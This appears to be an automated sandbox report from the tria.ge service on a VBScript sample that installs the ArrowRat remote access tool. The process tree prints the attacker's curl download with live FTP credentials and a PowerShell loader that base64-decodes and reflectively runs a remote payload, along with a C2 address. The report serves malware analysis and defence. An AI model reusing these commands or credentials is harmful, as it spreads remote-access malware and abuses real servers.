Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

d.vbs

windows7-x64

1

d.vbs

windows10-2004-x64

10

Resubmissions

31/08/2022, 12:55

220831-p6am9agbe2 10

19/08/2022, 17:19

220819-vwbqfsgcdj 10

Analysis

  • max time kernel
    149s
  • max time network
    154s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    31/08/2022, 12:55

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    d.vbs

  • Size

    816KB

  • MD5

    2af5abb6db76b3f1872d568880aced94

  • SHA1

    1e47fb1ba30452f72db8f71fe8dde5a7ad5c1f2c

  • SHA256

    3da90ba538cd2589d4018e15b760db3c508d6ffbb7032e3a66789a4c9d09c7b2

  • SHA512

    ba2e899b365b637547301e2402f16f686badb3f182456dc9c552d1e25eb5a6ca6fa9d75cfe9e260f6ba0edba608daf7dee516cc58c659b8b4844388b330889d2

  • SSDEEP

    6144:nfBfcfYfBfcfhfKfzfffBfcfYfBfcfhfKfqfBfcfYfBfcfhfKfdfBfcfYfBfcfht:r

Score
10/10
arrowratfsocitypersistencerat

Malware Config

Extracted

Credentials

  • Protocol:     ftp
  • Host:
    185.27.133.14
  • Port:
    21
  • Username:
    [email protected]
  • Password:
    Rfg250583

Extracted

Family

arrowrat

Botnet

Fsocity

C2

104.41.172.235:9091

Mutex

YzpcKpvwT.exe

Signatures

  • ArrowRat

    Remote access tool with various capabilities first seen in late 2021.

    ratarrowrat
  • Detects known downloader agent 1 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Modifies Installed Components in the registry 2 TTPs 1 IoCs
    persistence
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates connected drives 3 TTPs 1 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Suspicious use of SetThreadContext 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks SCSI registry key(s) 3 TTPs 22 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Modifies registry class 53 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 30 IoCs
  • Suspicious use of FindShellTrayWindow 49 IoCs
  • Suspicious use of SendNotifyMessage 21 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 22 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\d.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4736
    • C:\Windows\System32\curl.exe
      "C:\Windows\System32\curl.exe" -u [email protected]:Rfg250583 -o c:\Windows\Temp\dll4.txt ftp://fsocietyandtools%[email protected]/Servidor/Config/dll4.txt
      2⤵
        PID:2152
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $fs = Get-Content -Path 'C:\Windows\Temp\dll4.txt';[Byte[]] $rOWg = [system.Convert]::FromBase64string( $fs );[Reflection.Assembly]::Load($rOWg).GetType('ClassLibrary2.Class1').GetMethod('execution').Invoke($null, [object[]] ('https://paste.ee/d/6g9rH/0'))
        2⤵
        • Blocklisted process makes network request
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4932
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
          3⤵
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4532
          • C:\Windows\explorer.exe
            "C:\Windows\explorer.exe"
            4⤵
            • Modifies Installed Components in the registry
            • Enumerates connected drives
            • Checks SCSI registry key(s)
            • Modifies registry class
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of SendNotifyMessage
            PID:4460
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Fsocity 104.41.172.235 9091 YzpcKpvwT.exe
            4⤵
              PID:2332
      • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
        "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
        1⤵
        • Modifies registry class
        • Suspicious use of SetWindowsHookEx
        PID:804
      • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
        "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
        1⤵
        • Enumerates system info in registry
        • Modifies registry class
        • Suspicious use of SetWindowsHookEx
        PID:3084

      Network

      MITRE ATT&CK Enterprise v6

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Windows\Temp\dll4.txt
        Filesize

        10KB

        MD5

        dd65c1964341b1cc86c3a9f0ab5d97c3

        SHA1

        e4c96a42b04af33f7d49e912598533ab5ef205c7

        SHA256

        3f6933b8e6e683ae8ef2f9f1eece083c0e60702fe6a7dc250e20e01b1ed4ae06

        SHA512

        3ec78e1186e888c3854aa9f4f4ce16285a12294f615d0e29e3e108f84d76a0841cb597cfc0d35612cddc5d45b6d0e4a2a5e13b5099e3e019aba136468aba8f7d

        Download Submit

      • memory/2332-145-0x00000000053C0000-0x0000000005452000-memory.dmp

        Filesize

        584KB

        Download

      • memory/2332-144-0x0000000000400000-0x0000000000410000-memory.dmp

        Filesize

        64KB

        Download

      • memory/3084-171-0x000001692B110000-0x000001692B210000-memory.dmp

        Filesize

        1024KB

        Download

      • memory/3084-184-0x00000169182AB000-0x00000169182B6000-memory.dmp

        Filesize

        44KB

        Download

      • memory/3084-199-0x00000169182B0000-0x00000169182B4000-memory.dmp

        Filesize

        16KB

        Download

      • memory/3084-198-0x00000169182B0000-0x00000169182B4000-memory.dmp

        Filesize

        16KB

        Download

      • memory/3084-197-0x00000169182B0000-0x00000169182B4000-memory.dmp

        Filesize

        16KB

        Download

      • memory/3084-196-0x00000169182B0000-0x00000169182B4000-memory.dmp

        Filesize

        16KB

        Download

      • memory/3084-192-0x00000169182AD000-0x00000169182B0000-memory.dmp

        Filesize

        12KB

        Download

      • memory/3084-193-0x00000169182AD000-0x00000169182B0000-memory.dmp

        Filesize

        12KB

        Download

      • memory/3084-190-0x00000169182AD000-0x00000169182B0000-memory.dmp

        Filesize

        12KB

        Download

      • memory/3084-158-0x00000169182AA000-0x00000169182AE000-memory.dmp

        Filesize

        16KB

        Download

      • memory/3084-159-0x00000169182AA000-0x00000169182AE000-memory.dmp

        Filesize

        16KB

        Download

      • memory/3084-160-0x00000169182AA000-0x00000169182AE000-memory.dmp

        Filesize

        16KB

        Download

      • memory/3084-161-0x00000169182AA000-0x00000169182AE000-memory.dmp

        Filesize

        16KB

        Download

      • memory/3084-162-0x00000169182AA000-0x00000169182AE000-memory.dmp

        Filesize

        16KB

        Download

      • memory/3084-165-0x00000169182B0000-0x00000169182B4000-memory.dmp

        Filesize

        16KB

        Download

      • memory/3084-166-0x00000169182B0000-0x00000169182B4000-memory.dmp

        Filesize

        16KB

        Download

      • memory/3084-167-0x00000169182B0000-0x00000169182B4000-memory.dmp

        Filesize

        16KB

        Download

      • memory/3084-168-0x00000169182B0000-0x00000169182B4000-memory.dmp

        Filesize

        16KB

        Download

      • memory/3084-170-0x000001692B110000-0x000001692B210000-memory.dmp

        Filesize

        1024KB

        Download

      • memory/3084-191-0x00000169182AD000-0x00000169182B0000-memory.dmp

        Filesize

        12KB

        Download

      • memory/3084-174-0x00000169163C0000-0x00000169163E0000-memory.dmp

        Filesize

        128KB

        Download

      • memory/3084-188-0x00000169182AB000-0x00000169182B6000-memory.dmp

        Filesize

        44KB

        Download

      • memory/3084-173-0x00000169155D0000-0x00000169155F0000-memory.dmp

        Filesize

        128KB

        Download

      • memory/3084-175-0x0000016916040000-0x0000016916140000-memory.dmp

        Filesize

        1024KB

        Download

      • memory/3084-177-0x00000169182AB000-0x00000169182B6000-memory.dmp

        Filesize

        44KB

        Download

      • memory/3084-176-0x00000169182AB000-0x00000169182B6000-memory.dmp

        Filesize

        44KB

        Download

      • memory/3084-179-0x00000169182AB000-0x00000169182B6000-memory.dmp

        Filesize

        44KB

        Download

      • memory/3084-180-0x00000169182AB000-0x00000169182B6000-memory.dmp

        Filesize

        44KB

        Download

      • memory/3084-181-0x00000169182AB000-0x00000169182B6000-memory.dmp

        Filesize

        44KB

        Download

      • memory/3084-182-0x00000169182AB000-0x00000169182B6000-memory.dmp

        Filesize

        44KB

        Download

      • memory/3084-183-0x00000169182AB000-0x00000169182B6000-memory.dmp

        Filesize

        44KB

        Download

      • memory/3084-172-0x0000016916978000-0x0000016916980000-memory.dmp

        Filesize

        32KB

        Download

      • memory/3084-185-0x00000169182AB000-0x00000169182B6000-memory.dmp

        Filesize

        44KB

        Download

      • memory/3084-186-0x00000169182AB000-0x00000169182B6000-memory.dmp

        Filesize

        44KB

        Download

      • memory/3084-187-0x00000169182AB000-0x00000169182B6000-memory.dmp

        Filesize

        44KB

        Download

      • memory/4532-137-0x0000000000400000-0x000000000042C000-memory.dmp

        Filesize

        176KB

        Download

      • memory/4532-141-0x00000000051D0000-0x000000000526C000-memory.dmp

        Filesize

        624KB

        Download

      • memory/4532-140-0x0000000005570000-0x0000000005B14000-memory.dmp

        Filesize

        5.6MB

        Download

      • memory/4932-134-0x0000012F418D0000-0x0000012F418F2000-memory.dmp

        Filesize

        136KB

        Download

      • memory/4932-135-0x00007FFDE8820000-0x00007FFDE92E1000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/4932-139-0x00007FFDE8820000-0x00007FFDE92E1000-memory.dmp

        Filesize

        10.8MB

        Download